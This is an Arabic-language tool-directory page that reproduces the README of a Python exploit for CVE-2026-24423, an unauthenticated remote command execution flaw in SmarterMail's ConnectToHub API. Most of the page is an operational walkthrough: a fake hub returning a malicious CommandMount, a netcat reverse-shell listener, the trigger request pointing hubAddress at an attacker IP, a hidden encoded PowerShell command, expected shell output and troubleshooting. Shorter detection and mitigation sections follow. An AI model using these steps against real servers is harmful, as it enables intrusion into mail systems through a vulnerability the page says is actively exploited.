Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SmarterMail-CVE-2026-24423- — استغلال لثغرة CVE-2026-24423 — ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة وغير مصادق عليها في واجهة برمجة تطبيقات ConnectToHub الخاصة بـ SmarterMail. تؤثر على جميع الإصدارات السابقة للبناء 9511. | Kitploit
أدوات/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

استغلال لثغرة CVE-2026-24423 — ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة وغير مصادق عليها في واجهة برمجة تطبيقات ConnectToHub الخاصة بـ SmarterMail. تؤثر على جميع الإصدارات السابقة للبناء 9511.

عرض المستودع
منذ 14س 49دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة SmarterMail ConnectToHub RCE

استغلال مبني على Python لثغرة CVE-2026-24423، وهي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها في وظيفة ConnectToHub الخاصة بـ SmarterTools SmarterMail.

الاستخدام المقصود: اختبارات الأمان المصرح بها، ومسابقات CTF، ومختبرات Hack The Box، وبيئات البحث الخاضعة للتحكم فقط.


جدول المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • الإصدارات المتأثرة
  • وصف الثغرة
  • التفاصيل الفنية
  • مسار الاستغلال
  • المتطلبات
  • الإعداد
  • الاستخدام
  • المخرجات المتوقعة
  • استكشاف الأخطاء وإصلاحها
  • لقطات الشاشة
  • هيكل المشروع
  • التخفيف
  • المراجع
  • إخلاء المسؤولية

  • نظرة عامة

    CVE-2026-24423 هي ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها تؤثر على SmarterTools SmarterMail.

    توجد الثغرة في وظيفة ConnectToHub. يمكن لمهاجم غير مصادق توفير hubAddress خبيث، مما يتسبب في قيام خادم SmarterMail بتقديم طلب HTTP إلى خادم يتحكم فيه المهاجم.

    يستجيب الخادم الخبيث باستجابة setup-initial-connection مصممة بعناية تحتوي على قيمة SystemMount.CommandMount خاضعة للتحكم.

    تقوم نسخة SmarterMail المتأثرة بعد ذلك بمعالجة هذه القيمة كأمر لنظام التشغيل، مما يسمح بتنفيذ أوامر عشوائية في سياق أمان خدمة SmarterMail.

    تم تعيين درجة CVSS 4.0 قدرها 9.3 (حرجة) لهذه الثغرة وتصنيفها كـ CWE-306: غياب المصادقة لوظيفة حرجة.


    تفاصيل CVE

    الحقلالقيمة
    CVECVE-2026-24423
    البائعSmarterTools
    المنتجSmarterMail
    الثغرةتنفيذ أوامر عن بُعد غير مصادق عليه
    CWECWE-306
    CVSS v4.09.3 حرجة
    CVSS v3.19.8 حرجة
    ناقل الهجومالشبكة
    المصادقةلا شيء
    تفاعل المستخدملا شيء
    التعقيدمنخفض
    تاريخ النشر23 يناير 2026
    الإصدار المُصلَح9511

    يصف سجل CVE الرسمي المشكلة بأنها تنفيذ أوامر عن بُعد غير مصادق عليه عبر طريقة API الخاصة بـ ConnectToHub.


    الإصدارات المتأثرة

    إصدارات SmarterMail قبل Build 9511 متأثرة.

    يحدد سجل CVE النطاق المتأثر على النحو التالي:

    root@kitploit:~
    SmarterMail < 100.0.9511
    

    يحتوي الإصدار 9511، الذي صدر في 15 يناير 2026، على إصلاح البائع.

    المتأثرة

    root@kitploit:~
    < 100.0.9511
    

    المُصلَحة

    root@kitploit:~
    >= 100.0.9511
    

    تحقق دائمًا من الإصدار المثبت بدقة قبل محاولة إعادة إنتاج الثغرة.


    وصف الثغرة

    يتم كشف الوظيفة المتأثرة من خلال واجهة برمجة تطبيقات إدارة النظام في SmarterMail.

    العملية ذات الصلة هي:

    root@kitploit:~
    /api/v1/settings/sysadmin/connect-to-hub
    

    تقبل نقطة النهاية معامل hubAddress.

    من الناحية المفاهيمية، يمكن للمهاجم تقديم:

    root@kitploit:~
    {
        "hubAddress": "http://ATTACKER_IP:8081",
        "oneTimePassword": "temporary-value",
        "nodeName": "DC"
    }
    

    يقوم SmarterMail بعد ذلك بالاتصال بعنوان المحور المقدم ويطلب:

    root@kitploit:~
    /web/api/node-management/setup-initial-connection
    

    يستجيب الخادم الخاضع لسيطرة المهاجم بـ JSON يحتوي على كائن SystemMount خبيث.

    الخاصية المهمة هي:

    root@kitploit:~
    "SystemMount": {
        "Enabled": true,
        "ReadOnly": false,
        "MountPath": "...",
        "CommandMount": "..."
    }
    

    يتم استخدام قيمة CommandMount لاحقًا بواسطة التطبيق المتأثر كأمر لنظام التشغيل.

    يسمح هذا للمهاجم بالانتقال من:

    root@kitploit:~
    طلب HTTP غير مصادق عليه
    

    إلى:

    root@kitploit:~
    تنفيذ أوامر عن بُعد
    

    يؤكد التحليل الفني من VulnCheck أن hubAddress الخاضع لسيطرة المهاجم يتسبب في قيام SmarterMail بطلب نقطة نهاية setup-initial-connection الخاصة بالمهاجم وأن CommandMount المُعاد يمكن أن يوفر تنفيذ أوامر عشوائي.


    التفاصيل الفنية

    يتكون الاستغلال من مكونين:

    1. محور SmarterMail وهمي

    يستمع خادم Python إلى:

    root@kitploit:~
    POST /web/api/node-management/setup-initial-connection
    

    ويُرجع استجابة JSON مصممة بعناية تحتوي على SystemMount.CommandMount الخبيث.

    2. مستمع الصدفة العكسية

    يستقبل مستمع TCP منفصل الاتصال الذي بدأه الأمر المنفذ على الهدف.

    يستخدم هذا الاستغلال عمدًا منفذين منفصلين.

    root@kitploit:~
    8081
    └── محور SmarterMail الوهمي
    
    4455
    └── مستمع الصدفة العكسية
    

    مسار الاستغلال

    root@kitploit:~
    flowchart LR
    
        A[المهاجم<br/>10.10.14.50]
    
        H[محور SmarterMail الوهمي<br/>TCP/8081]
    
        T[هدف SmarterMail<br/>10.129.57.86]
    
        C[CommandMount<br/>تنفيذ الأوامر]
    
        P[PowerShell]
    
        L[مستمع الصدفة العكسية<br/>TCP/4455]
    
        A -->|تشغيل ConnectToHub| T
        T -->|HTTP POST| H
        H -->|JSON خبيث| T
        T -->|CommandMount| C
        C --> P
        P -->|TCP عكسي| L
        L --> A

    الاتصال 1 — المحور الوهمي

    root@kitploit:~
    الهدف
       |
       | HTTP
       v
    10.10.14.50:8081
    

    الاتصال 2 — الصدفة العكسية

    root@kitploit:~
    الهدف
       |
       | TCP
       v
    10.10.14.50:4455
    

    تخدم هذه المنافذ أغراضًا مختلفة ويجب عدم الخلط بينها.


    المتطلبات

    • Python 3
    • جهاز مهاجم بنظام Linux
    • شبكة VPN الخاصة بـ Hack The Box أو شبكة مصرح بها مكافئة
    • اتصال شبكة من الهدف إلى المهاجم
    • Netcat
    • تثبيت SmarterMail المتأثر

    يستخدم الاستغلال وحدات مكتبة Python القياسية فقط:

    root@kitploit:~
    http.server
    json
    base64
    

    لا توجد حزم Python خارجية مطلوبة.


    الإعداد

    قم بتحرير المتغيرات التالية:

    root@kitploit:~
    LHOST = "10.10.14.50"
    LPORT = 4455
    HUB_PORT = 8081
    

    لبيئة HTB المثال:

    root@kitploit:~
    LHOST     = 10.10.14.50
    LPORT     = 4455
    HUB_PORT  = 8081
    

    LHOST

    LHOST هو عنوان IP الخاص بالمهاجم الذي يمكن للهدف الوصول إليه.

    بالنسبة لـ Hack The Box، عادةً ما يكون هذا هو IP المعين لواجهة VPN الخاصة بـ HTB:

    root@kitploit:~
    ip addr show tun0
    

    مثال:

    root@kitploit:~
    tun0:
        inet 10.10.14.50
    

    لذلك:

    root@kitploit:~
    LHOST = "10.10.14.50"
    

    LPORT

    LPORT هو منفذ TCP الذي يستخدمه المهاجم لاستقبال الاتصال العكسي.

    مثال:

    root@kitploit:~
    LPORT = 4455
    

    HUB_PORT

    HUB_PORT هو منفذ HTTP المستخدم بواسطة محور SmarterMail الخبيث.

    مثال:

    root@kitploit:~
    HUB_PORT = 8081
    

    الاستخدام

    1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/<username>/<repository>.git
    cd <repository>
    

    2. إعداد الاستغلال

    قم بتحرير:

    root@kitploit:~
    nano exploit.py
    

    اضبط:

    root@kitploit:~
    LHOST = "10.10.14.50"
    LPORT = 4455
    HUB_PORT = 8081
    

    3. بدء مستمع الصدفة العكسية

    افتح طرفية:

    root@kitploit:~
    nc -lvnp 4455
    

    المتوقع:

    root@kitploit:~
    Listening on 0.0.0.0 4455
    

    أبقِ هذه الطرفية مفتوحة.


    4. بدء المحور الخبيث

    افتح طرفية ثانية:

    root@kitploit:~
    python3 exploit.py
    

    إذا كان ربط المنفذ المحدد يتطلب صلاحيات مرتفعة:

    root@kitploit:~
    sudo python3 exploit.py
    

    المخرجات المتوقعة:

    root@kitploit:~
    ============================================================
     SmarterMail fake hub
    ============================================================
    [+] LHOST:      10.10.14.50
    [+] LPORT:      4455
    [+] HUB:        10.10.14.50:8081
    
    [+] Waiting for SmarterMail...
    ============================================================
    

    5. تشغيل ConnectToHub

    أرسل الطلب المناسب إلى نسخة SmarterMail المتأثرة.

    يجب أن يشير hubAddress المقدم إلى خادم HTTP الخبيث:

    root@kitploit:~
    {
        "hubAddress": "http://10.10.14.50:8081",
        "oneTimePassword": "tempst",
        "nodeName": "DC"
    }
    

    القيمة المهمة هي:

    root@kitploit:~
    http://10.10.14.50:8081
    

    لا تستخدم منفذ الصدفة العكسية كمنفذ للمحور.


    ملخص إعداد المنافذ

    الغرضIPالمنفذ
    VPN المهاجم10.10.14.50—
    محور SmarterMail الوهمي10.10.14.508081
    الصدفة العكسية10.10.14.504455
    هدف HTB10.129.57.86—

    التدفق الناتج هو:

    root@kitploit:~
    hubAddress
        ↓
    10.10.14.50:8081
        ↓
    CommandMount الخبيث
        ↓
    PowerShell
        ↓
    10.10.14.50:4455
    

    ترميز الحمولة

    يقوم الاستغلال بإنشاء حمولة PowerShell ديناميكيًا.

    تتوقع معلمة -EncodedCommand في PowerShell أن يتم ترميز الأمر باستخدام UTF-16LE قبل ترميز Base64.

    يقوم السكربت بتنفيذ:

    root@kitploit:~
    encoded = base64.b64encode(
        PS.encode("utf-16le")
    ).decode()
    

    يتم تنظيم الأمر النهائي على النحو التالي:

    root@kitploit:~
    powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>
    

    يتجنب هذا الترميز اليدوي للحمولة ويمنع أخطاء ترميز UTF-8/UTF-16LE الشائعة.


    المخرجات المتوقعة

    عندما يصل الهدف إلى المحور الخبيث:

    root@kitploit:~
    [+] Received SmarterMail connection
    [+] Path: /web/api/node-management/setup-initial-connection
    [+] Body: ...
    [+] Sending CommandMount payload
    [+] Reverse shell -> 10.10.14.50:4455
    

    يجب أن يستقبل مستمع الصدفة العكسية اتصالًا بعد ذلك:

    root@kitploit:~
    Connection received on 10.129.57.86 XXXXX
    

    بمجرد الاتصال، يمكن إجراء تحقق أساسي:

    root@kitploit:~
    whoami
    
    root@kitploit:~
    hostname
    

    استكشاف الأخطاء وإصلاحها

    المحور الوهمي لا يستقبل أي اتصال

    تحقق من أن الخادم يستمع:

    root@kitploit:~
    ss -lntp | grep 8081
    

    تحقق من عنوان VPN:

    root@kitploit:~
    ip addr show tun0
    

    تأكد من أن LHOST يطابق العنوان الذي يمكن الوصول إليه من الهدف.


    المحور الوهمي يستقبل HTTP 200 ولكن لا توجد صدفة

    يعني نجاح طلب HTTP أن المرحلة الأولى تعمل:

    root@kitploit:~
    الهدف
      |
      | HTTP
      v
    المحور الوهمي :8081
    

    لا يعني ذلك بالضرورة نجاح المرحلة الثانية.

    تحقق من:

    root@kitploit:~
    ss -lntp | grep 4455
    

    تأكد من بدء Netcat قبل تشغيل الاستغلال.

    تحقق أيضًا من:

    root@kitploit:~
    LHOST = عنوان IP للمهاجم يمكن للهدف الوصول إليه
    LPORT = منفذ المستمع
    

    Netcat يستقبل طلب HTTP بدلاً من الصدفة

    إذا رأيت:

    root@kitploit:~
    POST /web/api/node-management/setup-initial-connection
    

    داخل Netcat، فهذا يعني أنك وجهت hubAddress إلى مستمع الصدفة العكسية.

    غير صحيح:

    root@kitploit:~
    hubAddress = http://10.10.14.50:4455
    

    صحيح:

    root@kitploit:~
    hubAddress = http://10.10.14.50:8081
    

    يجب أن يظل المنفذان منفصلين.


    استجابة HTTP 400

    يمكن أن تحدث استجابة 400 عندما لا يُرجع المحور الوهمي البنية المتوقعة من SmarterMail.

    تحقق من أن الاستجابة تحتوي على:

    root@kitploit:~
    "SystemMount": {
        "Enabled": true,
        "ReadOnly": false,
        "MountPath": "...",
        "CommandMount": "..."
    }
    

    تأكد أيضًا من أن المسار المطلوب هو بالضبط:

    root@kitploit:~
    /web/api/node-management/setup-initial-connection
    

    يحدد التحليل العام للثغرة هذه النقطة الطرفية كجزء من تدفق ConnectToHub المتأثر.


    لقطات الشاشة

    أضف لقطات شاشة من مختبر HTB هنا.

    1. استكشاف الهدف

    مثال:

    root@kitploit:~
    ![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)
    

    لقطة شاشة مقترحة:

    • نتائج Nmap
    • خدمة/إصدار SmarterMail
    • المنفذ المكشوف ذو الصلة

    2. المحور الخبيث

    root@kitploit:~
    ![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)
    

    أظهر:

    root@kitploit:~
    [+] Received SmarterMail connection
    [+] Sending CommandMount payload
    

    3. تشغيل الاستغلال

    root@kitploit:~
    ![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)
    

    أظهر الطلب الذي يحتوي على:

    root@kitploit:~
    {
        "hubAddress": "http://10.10.14.50:8081"
    }
    

    4. الصدفة العكسية

    root@kitploit:~
    ![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)
    

    أظهر:

    root@kitploit:~
    Connection received on 10.129.57.86
    

    وموجه الأوامر الناتج.


    هيكل المشروع

    root@kitploit:~
    smartermail-rce/
    │
    ├── exploit.py
    ├── README.md
    │
    └── screenshots/
        ├── nmap.png
        ├── burp-request.png
        ├── fake-hub.png
        └── reverse-shell.png
    

    الاكتشاف

    تشمل المؤشرات المحتملة للاستغلال طلبات غير متوقعة إلى:

    root@kitploit:~
    /api/v1/settings/sysadmin/connect-to-hub
    

    واتصالات صادرة من خادم SmarterMail إلى مضيفي HTTP غير معروفين سابقًا.

    يجب على المسؤولين أيضًا مراجعة سجلات التطبيق وIIS/الوكيل العكسي والشبكة بحثًا عن نشاط ConnectToHub مشبوه.

    تم إدراج CVE-2026-24423 في كتالوج الثغرات المعروفة المستغلة لدى CISA، مما يشير إلى أنه تم ملاحظة الاستغلال خارج بيئات المختبرات.


    التخفيف

    العلاج الأساسي هو ترقية SmarterMail إلى Build 9511 أو أحدث. عالج إصدار البائع الصادر في 15 يناير 2026 الثغرة.

    حيثما لا يكون التصحيح الفوري ممكنًا، يجب على المؤسسات أيضًا النظر في:

    • تقييد الوصول إلى واجهات برمجة تطبيقات إدارة SmarterMail.
    • منع الوصول الخارجي غير الضروري إلى نقاط نهاية الإدارة.
    • تطبيق تجزئة الشبكة.
    • مراقبة الاتصالات الصادرة من خادم SmarterMail.
    • مراجعة السجلات التاريخية بحثًا عن طلبات ConnectToHub مشبوهة.
    • التحقيق في تنفيذ الأوامر غير المتوقع بواسطة حساب خدمة SmarterMail.

    المراجع

    • سجل CVE: CVE-2026-24423
    • VulnCheck: SmarterMail ConnectToHub Unauthenticated RCE
    • CODE WHITE: قائمة الثغرات العامة
    • ملاحظات إصدار SmarterTools SmarterMail
    • كتالوج الثغرات المعروفة المستغلة لدى CISA

    إخلاء المسؤولية

    تم توفير هذا المشروع لأغراض البحث الأمني المصرح به والتعليم فقط.

    لا تستخدم هذا الاستغلال ضد الأنظمة التي لا تملكها أو ليس لديك إذن صريح لاختبارها.

    لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر أو فقدان البيانات أو الوصول غير المصرح به أو أي عواقب أخرى ناتجة عن استخدام هذا البرنامج.

    استخدم فقط في بيئات خاضعة للتحكم مثل:

    • Hack The Box
    • مسابقات Capture-the-Flag
    • المختبرات الشخصية
    • اختبارات الاختراق المصرح بها
    • بيئات البحث الأمني

    الاعتمادات

    نُسبت CVE-2026-24423 إلى:

    • Sina Kheirkhah
    • Piotr Bazydlo
    • Markus Wulftange
    • Cale Black

    تم نشر CVE بواسطة VulnCheck في 23 يناير 2026.

    تنزيل الأداة